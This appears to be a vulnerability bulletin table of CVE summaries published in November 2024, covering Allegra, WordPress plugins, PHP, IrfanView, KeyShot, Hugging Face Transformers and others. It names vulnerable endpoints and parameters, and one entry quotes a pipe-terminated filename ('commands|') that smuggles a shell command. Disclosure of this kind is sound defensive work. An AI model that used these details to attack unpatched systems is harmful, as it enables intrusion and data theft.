Allegra unzipFile Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the unzipFile method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-22513. | 2024-11-22 | not yet calculated | CVE-2023-51645 |
| n/a -- n/a |
Allegra uploadSimpleFile Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the uploadSimpleFile method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-22527. | 2024-11-22 | not yet calculated | CVE-2023-51646 |
| n/a -- n/a |
Allegra saveInlineEdit Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the saveInlineEdit method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-22528. | 2024-11-22 | not yet calculated | CVE-2023-51647 |
| n/a -- n/a |
Allegra getFileContentAsString Directory Traversal Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Allegra. Although authentication is required to exploit this vulnerability, the product implements a registration mechanism that can be used to create a new user with a sufficient privilege level. The specific flaw exists within the getFileContentAsString method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22530. | 2024-11-22 | not yet calculated | CVE-2023-51648 |
| n/a -- n/a |
Allegra serveMathJaxLibraries Directory Traversal Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the serveMathJaxLibraries method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22532. | 2024-11-22 | not yet calculated | CVE-2023-52332 |
| n/a -- n/a |
Allegra saveFile Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Although authentication is required to exploit this vulnerability, product implements a registration mechanism that can be used to create a user with a sufficient privilege level. The specific flaw exists within the saveFile method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-22548. | 2024-11-22 | not yet calculated | CVE-2023-52333 |
| n/a -- n/a |
Allegra downloadAttachmentGlobal Directory Traversal Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Allegra. Although authentication is required to exploit this vulnerability, product implements a registration mechanism that can be used to create a user with a sufficient privilege level. The specific flaw exists within the downloadAttachmentGlobal action. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22507. | 2024-11-22 | not yet calculated | CVE-2023-52334 |
| n/a -- n/a |
Advantech iView ConfigurationServlet SQL Injection Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech iView. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ConfigurationServlet servlet, which listens on TCP port 8080 by default. When parsing the column_value element, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-17863. | 2024-11-22 | not yet calculated | CVE-2023-52335 |
| n/a -- n/a |
A vulnerability was found in DataGear up to 4.60. It has been declared as critical. This vulnerability affects unknown code of the file /dataSet/resolveSql. The manipulation of the argument sql leads to sql injection. The attack can be initiated remotely. Upgrading to version 4.7.0 is able to address this issue. It is recommended to upgrade the affected component. | 2024-11-23 | not yet calculated | CVE-2023-7299 |
| n/a -- n/a |
NVIDIA Delegated Licensing Service for all appliance platforms contains a vulnerability where an attacker may cause an unauthorized action. A successful exploit of this vulnerability may lead to partial denial of service and confidential information disclosure. | 2024-11-23 | not yet calculated | CVE-2024-0122 |
| n/a -- n/a |
NVIDIA Base Command Manager contains a missing authentication vulnerability in the CMDaemon component. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering. | 2024-11-23 | not yet calculated | CVE-2024-0138 |
| n/a -- n/a |
Pega Platform versions 6.x to Infinity 24.1.1 are affected by an issue with Improper Control of Generation of Code | 2024-11-20 | not yet calculated | CVE-2024-10094 |
| n/a -- n/a |
In the process of testing the MailPoet WordPress plugin before 5.3.2, a vulnerability was found that allows you to implement Stored XSS on behalf of the editor by embedding malicious script, which entails account takeover backdoor | 2024-11-19 | not yet calculated | CVE-2024-10103 |
| n/a -- n/a |
Local File Inclusion vulnerability in M-Files Server in versions before 24.11 (excluding 24.8 SR1, 24.2 SR3 and 23.8 SR7) allows an authenticated user to read server local files of a limited set of filetypes via document preview. | 2024-11-20 | not yet calculated | CVE-2024-10126 |
| n/a -- n/a |
Authentication bypass condition in LDAP authentication in M-Files server versions before 24.11 supported usage of OpenLDAP configurations that allowed user authentication without a password when the LDAP server itself had the vulnerable configuration. | 2024-11-20 | not yet calculated | CVE-2024-10127 |
| n/a -- n/a |
Heap-based Buffer Overflow and Uninitialized Variable vulnerabilities exist in the X_B and SAT file reading procedure in eDrawings from Release SOLIDWORKS 2024 through Release SOLIDWORKS 2025. These vulnerabilities could allow an attacker to execute arbitrary code while opening a specially crafted X_B or SAT file. | 2024-11-19 | not yet calculated | CVE-2024-10204 |
| n/a -- n/a |
The Kubernetes kubelet component allows arbitrary command execution via specially crafted gitRepo volumes.This issue affects kubelet: through 1.28.11, from 1.29.0 through 1.29.6, from 1.30.0 through 1.30.2. | 2024-11-22 | not yet calculated | CVE-2024-10220 |
| n/a -- n/a |
Qualys discovered that if unsanitized input was used with the library Modules::ScanDeps, before version 1.36 a local attacker could possibly execute arbitrary shell commands by open()ing a "pesky pipe" (such as passing "commands|" as a filename) or by passing arbitrary strings to eval(). | 2024-11-19 | not yet calculated | CVE-2024-10224 |
| n/a -- n/a |
There exists a code execution vulnerability in the Car App Android Jetpack Library. CarAppService uses deserialization logic that allows construction of arbitrary java classes. This can lead to arbitrary code execution when combined with specific Java deserialization gadgets. An attacker needs to install a malicious application on victims device to be able to attack any application that uses vulnerable library. We recommend upgrading the library past version 1.7.0-beta02. | 2024-11-20 | not yet calculated | CVE-2024-10382 |
| n/a -- n/a |
The WordPress GDPR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gdpr_firstname' and 'gdpr_lastname' parameters in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-19 | not yet calculated | CVE-2024-10388 |
| n/a -- n/a |
The Tutor LMS plugin for WordPress is vulnerable to bypass to user registration in versions up to, and including, 2.7.6. This is due to a missing check for the 'users_can_register' option in the 'register_instructor' function. This makes it possible for unauthenticated attackers to register as the default role on the site, even if registration is disabled. | 2024-11-21 | not yet calculated | CVE-2024-10393 |
| n/a -- n/a |
The Tutor LMS plugin for WordPress is vulnerable to SQL Injection via the 'rating_filter' parameter in all versions up to, and including, 2.7.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-11-21 | not yet calculated | CVE-2024-10400 |
| n/a -- n/a |
Brocade Fabric OS versions before 8.2.3e2, versions 9.0.0 through 9.2.0c, and 9.2.1 through 9.2.1a can capture the SFTP/FTP server password used for a firmware download operation initiated by SANnav or through WebEM in a weblinker core dump that is later captured via supportsave. | 2024-11-21 | not yet calculated | CVE-2024-10403 |
| n/a -- n/a |
The Media File Rename, Find Unused File, Add Alt text, Caption, Desc For Image SEO WordPress plugin before 1.5.0 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads. | 2024-11-21 | not yet calculated | CVE-2024-10482 |
| n/a -- n/a |
The Google for WooCommerce plugin for WordPress is vulnerable to Information Disclosure in all versions up to, and including, 2.8.6. This is due to publicly accessible print_php_information.php file. This makes it possible for unauthenticated attackers to retrieve information about Webserver and PHP configuration, which can be used to aid other attacks. | 2024-11-18 | not yet calculated | CVE-2024-10486 |
| n/a -- n/a |
In the process of testing the SEO Plugin by Squirrly SEO WordPress plugin before 12.3.21, a vulnerability was found that allows you to implement Stored XSS on behalf of the editor by embedding malicious script, which entails account takeover backdoor | 2024-11-20 | not yet calculated | CVE-2024-10515 |
| n/a -- n/a |
The WP Project Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check in the 'check' method of the 'Create_Milestone', 'Create_Task_List', 'Create_Task', and 'Delete_Task' classes in version 2.6.14. This makes it possible for unauthenticated attackers to create milestones, create task lists, create tasks, or delete tasks in any project. NOTE: Version 2.6.14 implemented a partial fix for this vulnerability. | 2024-11-20 | not yet calculated | CVE-2024-10520 |
| n/a -- n/a |
Applications that use Wget to access a remote resource using shorthand URLs and pass arbitrary user credentials in the URL are vulnerable. In these cases attackers can enter crafted credentials which will cause Wget to access an arbitrary host. | 2024-11-19 | not yet calculated | CVE-2024-10524 |
| n/a -- n/a |
: Insufficient Logging vulnerability in OpenText Secure Content Manager on Windows allows Audit Log Manipulation.This issue affects Secure Content Manager: from 10.1 before <24.4. End-users can potentially exploit the vulnerability to exclude audit trails from being recorded on the client side. | 2024-11-22 | not yet calculated | CVE-2024-10863 |
| n/a -- n/a |
The Save as PDF Plugin by Pdfcrowd plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'save_as_pdf_pdfcrowd' shortcode in all versions up to, and including, 4.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-20 | not yet calculated | CVE-2024-10891 |
| n/a -- n/a |
The Contact Form 7 Email Add on plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9 via the cf7_email_add_on_add_admin_template() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php files can be uploaded and included. | 2024-11-21 | not yet calculated | CVE-2024-10898 |
| n/a -- n/a |
The The WooCommerce Product Table Lite plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.8.6. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. The same 'id' parameter is vulnerable to Reflected Cross-Site Scripting as well. | 2024-11-20 | not yet calculated | CVE-2024-10899 |
| n/a -- n/a |
The Clone plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.4.6 via deserialization of untrusted input in the 'recursive_unserialized_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. | 2024-11-20 | not yet calculated | CVE-2024-10913 |
| n/a -- n/a |
Qualys discovered that needrestart, before version 3.8, passes unsanitized data to a library (Modules::ScanDeps) which expects safe input. This could allow a local attacker to execute arbitrary shell commands. Please see the related CVE-2024-10224 in Modules::ScanDeps. | 2024-11-19 | not yet calculated | CVE-2024-11003 |
| n/a -- n/a |
Firebase JavaScript SDK utilizes a "FIREBASE_DEFAULTS" cookie to store configuration data, including an "_authTokenSyncURL" field used for session synchronization. If this cookie field is preset via an attacker by any other method, the attacker can manipulate the "_authTokenSyncURL" to point to their own server and it would allow an actor to capture user session data transmitted by the SDK. We recommend upgrading Firebase JS SDK at least to 10.9.0. | 2024-11-18 | not yet calculated | CVE-2024-11023 |
| n/a -- n/a |
The The GamiPress - The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution via gamipress_get_user_earnings AJAX action in all versions up to, and including, 7.1.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2024-11-19 | not yet calculated | CVE-2024-11036 |
| n/a -- n/a |
The The WPB Popup for Contact Form 7 - Showing The Contact Form 7 Popup on Button Click - CF7 Popup plugin for WordPress is vulnerable to arbitrary shortcode execution via wpb_pcf_fire_contact_form AJAX action in all versions up to, and including, 1.7.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2024-11-19 | not yet calculated | CVE-2024-11038 |
| n/a -- n/a |
The WordPress GDPR plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'WordPress_GDPR_Data_Delete::check_action' function in all versions up to, and including, 2.0.2. This makes it possible for unauthenticated attackers to delete arbitrary users. | 2024-11-19 | not yet calculated | CVE-2024-11069 |
| n/a -- n/a |
A vulnerability in the Incoming Goods Suite allows a user with unprivileged access to the underlying system (e.g. local or via SSH) a privilege escalation to the administrative level due to the usage of component vendor Docker images running with root permissions. Exploiting this misconfiguration leads to the fact that an attacker can gain administrative control. over the whole system. | 2024-11-19 | not yet calculated | CVE-2024-11075 |
| n/a -- n/a |
The Simple Membership plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.5.5 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator. | 2024-11-21 | not yet calculated | CVE-2024-11088 |
| n/a -- n/a |
The Anonymous Restricted Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.5 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to logged-in users. | 2024-11-21 | not yet calculated | CVE-2024-11089 |
| n/a -- n/a |
The PublishPress Revisions: Duplicate Posts, Submit, Approve and Schedule Content Changes plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.15 via the 'actAjaxRevisionDiffs' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including revisions of posts and pages. | 2024-11-20 | not yet calculated | CVE-2024-11154 |
| n/a -- n/a |
Improper access control vulnerability in M-Files Aino in versions before 24.10 allowed an authenticated user to access object information via incorrect calculation of effective permissions. | 2024-11-20 | not yet calculated | CVE-2024-11176 |
| n/a -- n/a |
The Classified Listing - Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a misconfigured check on the 'rtcl_import_settings' function in all versions up to, and including, 3.1.15.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update limited arbitrary options on the WordPress site. This can be leveraged to update the Subscriber role with Administrator-level capabilities to gain administrative user access to a vulnerable site. The vulnerability is limited in that the option updated must have a value that is an array. | 2024-11-19 | not yet calculated | CVE-2024-11194 |
| n/a -- n/a |
The Email Subscription Popup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's print_email_subscribe_form shortcode in all versions up to, and including, 1.2.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-19 | not yet calculated | CVE-2024-11195 |
| n/a -- n/a |
In PHP versions 8.1.* before 8.1.31, 8.2.* before 8.2.26, 8.3.* before 8.3.14, due to an error in convert.quoted-printable-decode filter certain data can lead to buffer overread by one byte, which can in certain circumstances lead to crashes or disclose content of other memory areas. | 2024-11-24 | not yet calculated | CVE-2024-11233 |
| n/a -- n/a |
In PHP versions 8.1.* before 8.1.31, 8.2.* before 8.2.26, 8.3.* before 8.3.14, when using streams with configured proxy and "request_fulluri" option, the URI is not properly sanitized which can lead to HTTP request smuggling and allow the attacker to use the proxy to perform arbitrary HTTP requests originating from the server, thus potentially gaining access to resources not normally available to the external user. | 2024-11-24 | not yet calculated | CVE-2024-11234 |
| n/a -- n/a |
In PHP versions 8.1.* before 8.1.31, 8.2.* before 8.2.26, 8.3.* before 8.3.14, uncontrolled long string inputs to ldap_escape() function on 32-bit systems can cause an integer overflow, resulting in an out-of-bounds write. | 2024-11-24 | not yet calculated | CVE-2024-11236 |
| n/a -- n/a |
The pathname of the root directory to a Restricted Directory ('Path Traversal') vulnerability in Korenix JetPort 5601 allows Path Traversal.This issue affects JetPort 5601: through 1.2. | 2024-11-18 | not yet calculated | CVE-2024-11303 |
| n/a -- n/a |
Missing input validation in the SEH Computertechnik utnserver Pro, SEH Computertechnik utnserver ProMAX, SEH Computertechnik INU-100 web-interface allows stored Cross-Site Scripting (XSS). This issue affects utnserver Pro, utnserver ProMAX, INU-100 version 20.1.22 and below. | 2024-11-18 | not yet calculated | CVE-2024-11304 |
| n/a -- n/a |
A vulnerability classified as critical was found in Altenergy Power Control Software up to 20241108. This vulnerability affects the function get_status_zigbee of the file /index.php/display/status_zigbee. The manipulation of the argument date leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-18 | not yet calculated | CVE-2024-11305 |
| n/a -- n/a |
A vulnerability, which was classified as critical, has been found in Altenergy Power Control Software up to 20241108. This issue affects some unknown processing of the file /index.php/display/database/. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other endpoints might be affected as well. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-18 | not yet calculated | CVE-2024-11306 |
| n/a -- n/a |
An IDOR (Insecure Direct Object Reference) vulnerability has been discovered in AbsysNet, affecting version 2.3.1. This vulnerability could allow a remote attacker to obtain the session of an unauthenticated user by brute-force attacking the session identifier on the "/cgi-bin/ocap/" endpoint. | 2024-11-18 | not yet calculated | CVE-2024-11318 |
| n/a -- n/a |
Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora FMS: from 700 through <=777.4 | 2024-11-21 | not yet calculated | CVE-2024-11320 |
| n/a -- n/a |
Hugging Face Transformers MobileViTV2 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of configuration files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-24322. | 2024-11-22 | not yet calculated | CVE-2024-11392 |
| n/a -- n/a |
Hugging Face Transformers MaskFormer Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25191. | 2024-11-22 | not yet calculated | CVE-2024-11393 |
| n/a -- n/a |
Hugging Face Transformers Trax Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25012. | 2024-11-22 | not yet calculated | CVE-2024-11394 |
| n/a -- n/a |
Type Confusion in V8 in Google Chrome prior to 131.0.6778.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2024-11-19 | not yet calculated | CVE-2024-11395 |
| n/a -- n/a |
The Grid View Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0 via deserialization of untrusted input from cs_all_photos_details parameter. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. | 2024-11-21 | not yet calculated | CVE-2024-11409 |
| n/a -- n/a |
7-Zip Zstandard Decompression Integer Underflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the implementation of Zstandard decompression. The issue results from the lack of proper validation of user-supplied data, which can result in an integer underflow before writing to memory. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24346. | 2024-11-22 | not yet calculated | CVE-2024-11477 |
| n/a -- n/a |
A vulnerability was found in 115cms up to 20240807. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /index.php/admin/web/useradmin.html. The manipulation of the argument ks leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-20 | not yet calculated | CVE-2024-11491 |
| n/a -- n/a |
Buffer overflow vulnerability in OllyDbg, version 1.10, which could allow a local attacker to execute arbitrary code due to lack of proper bounds checking. | 2024-11-20 | not yet calculated | CVE-2024-11495 |
| n/a -- n/a |
IrfanView DWG File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWG files. The issue results from the lack of proper validation of user-supplied data, which can result in a read before the start of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22169. | 2024-11-22 | not yet calculated | CVE-2024-11506 |
| n/a -- n/a |
IrfanView DXF File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22177. | 2024-11-22 | not yet calculated | CVE-2024-11507 |
| n/a -- n/a |
IrfanView DXF File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22184. | 2024-11-22 | not yet calculated | CVE-2024-11508 |
| n/a -- n/a |
IrfanView SVG File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SVG files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22185. | 2024-11-22 | not yet calculated | CVE-2024-11509 |
| n/a -- n/a |
IrfanView WBZ plugin WB1 File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of WB1 files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22718. | 2024-11-22 | not yet calculated | CVE-2024-11510 |
| n/a -- n/a |
IrfanView XCF Plugin XCF File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XCF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22735. | 2024-11-22 | not yet calculated | CVE-2024-11511 |
| n/a -- n/a |
IrfanView WBZ Plugin WB1 File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of WB1 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22741. | 2024-11-22 | not yet calculated | CVE-2024-11512 |
| n/a -- n/a |
Luxion KeyShot 3DS File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of 3DS files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23681. | 2024-11-22 | not yet calculated | CVE-2024-11576 |
| n/a -- n/a |
Luxion KeyShot SKP File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23685. | 2024-11-22 | not yet calculated | CVE-2024-11577 |
| n/a -- n/a |
Luxion KeyShot 3DS File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of 3DS files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23693. | 2024-11-22 | not yet calculated | CVE-2024-11578 |
| n/a -- n/a |
Luxion KeyShot OBJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of obj files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23697. | 2024-11-22 | not yet calculated | CVE-2024-11579 |
| n/a -- n/a |
Luxion KeyShot ABC File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of abc files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23700. | 2024-11-22 | not yet calculated | CVE-2024-11580 |
| n/a -- n/a |
Luxion KeyShot JT File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of jt files. The issue results from the lack of proper validation of user-supplied data, which can result in a read before the start of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23826. | 2024-11-22 | not yet calculated | CVE-2024-11581 |
| n/a -- n/a |
Ubuntu's implementation of pulseaudio can be crashed by a malicious program if a bluetooth headset is connected. | 2024-11-23 | not yet calculated | CVE-2024-11586 |
| n/a -- n/a |
A vulnerability, which was classified as critical, was found in 1000 Projects Beauty Parlour Management System 1.0. This affects an unknown part of the file /admin/add-services.php. The manipulation of the argument sername leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-11-21 | not yet calculated | CVE-2024-11591 |
| n/a -- n/a |
A vulnerability has been found in 1000 Projects Beauty Parlour Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/about-us.php. The manipulation of the argument pagetitle leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-11-21 | not yet calculated | CVE-2024-11592 |
| n/a -- n/a |
FiveCo RAP dissector infinite loop in Wireshark 4.4.0 to 4.4.1 and 4.2.0 to 4.2.8 allows denial of service via packet injection or crafted capture file | 2024-11-21 | not yet calculated | CVE-2024-11595 |
| n/a -- n/a |
ECMP dissector crash in Wireshark 4.4.0 to 4.4.1 and 4.2.0 to 4.2.8 allows denial of service via packet injection or crafted capture file | 2024-11-21 | not yet calculated | CVE-2024-11596 |
| n/a -- n/a |
